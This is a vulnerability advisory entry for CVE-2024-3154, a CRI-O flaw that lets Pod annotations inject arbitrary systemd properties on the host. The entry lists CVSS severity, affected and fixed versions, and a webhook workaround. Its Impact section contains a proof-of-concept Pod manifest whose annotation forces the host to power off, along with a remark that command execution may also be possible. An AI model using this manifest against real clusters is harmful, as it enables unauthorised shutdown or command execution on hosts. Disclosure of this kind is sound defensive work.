GHSA-2cgq-h8xw-2v5j

Source

https://github.com/advisories/GHSA-2cgq-h8xw-2v5j

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-2cgq-h8xw-2v5j/GHSA-2cgq-h8xw-2v5j.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-2cgq-h8xw-2v5j

Aliases

CVE-2024-3154
GO-2024-2791

Related

Published

2024-04-30T09:39:38Z

Modified

2024-06-04T16:56:44.490781Z

Severity

7.2 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CVSS Calculator

Summary

CRI-O vulnerable to an arbitrary systemd property injection

Details

Impact

On CRI-O, it looks like an arbitrary systemd property can be injected via a Pod annotation:

---
apiVersion: v1
kind: Pod
metadata:
  name: poc-arbitrary-systemd-property-injection
  annotations:
    # I believe that ExecStart with an arbitrary command works here too,
    # but I haven't figured out how to marshalize the ExecStart struct to gvariant string.
    org.systemd.property.SuccessAction: "'poweroff-force'"
spec:
  containers:
    - name: hello
      image: [quay.io/podman/hello](http://quay.io/podman/hello)

This means that any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.

Tested with CRI-O v1.24 on minikube. I didn't test the latest v1.29 because it is incompatible with minikube: https://github.com/kubernetes/minikube/pull/18367

Thanks to Cédric Clerget (GitHub ID @cclerget) for finding out that CRI-O just passes pod annotations to OCI annotations: https://github.com/opencontainers/runc/pull/3923#discussion_r1532292536

CRI-O has to filter out annotations that have the prefix "org.systemd.property."

See also: - https://github.com/opencontainers/runtime-spec/blob/main/features.md#unsafe-annotations-in-configjson - https://github.com/opencontainers/runc/pull/4217

Workarounds

Unfortunately, the only workarounds would involve an external mutating webhook to disallow these annotations

References

Database specific

{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-77"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-30T09:39:38Z"
}

References

Affected packages

Go / github.com/cri-o/cri-o

Package

Name: github.com/cri-o/cri-o; View open source insights on deps.dev
Purl: pkg:golang/github.com/cri-o/cri-o

Affected ranges

Type: SEMVER
Events: Introduced

1.29.0

Fixed

1.29.4

Database specific

{
    "last_known_affected_version_range": "<= 1.29.3"
}

Go / github.com/cri-o/cri-o

Package

Name: github.com/cri-o/cri-o; View open source insights on deps.dev
Purl: pkg:golang/github.com/cri-o/cri-o

Affected ranges

Type: SEMVER
Events: Introduced

1.28.0

Fixed

1.28.6

Database specific

{
    "last_known_affected_version_range": "<= 1.28.5"
}

Go / github.com/cri-o/cri-o

Package

Name: github.com/cri-o/cri-o; View open source insights on deps.dev
Purl: pkg:golang/github.com/cri-o/cri-o

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.27.6

Database specific

{
    "last_known_affected_version_range": "<= 1.27.5"
}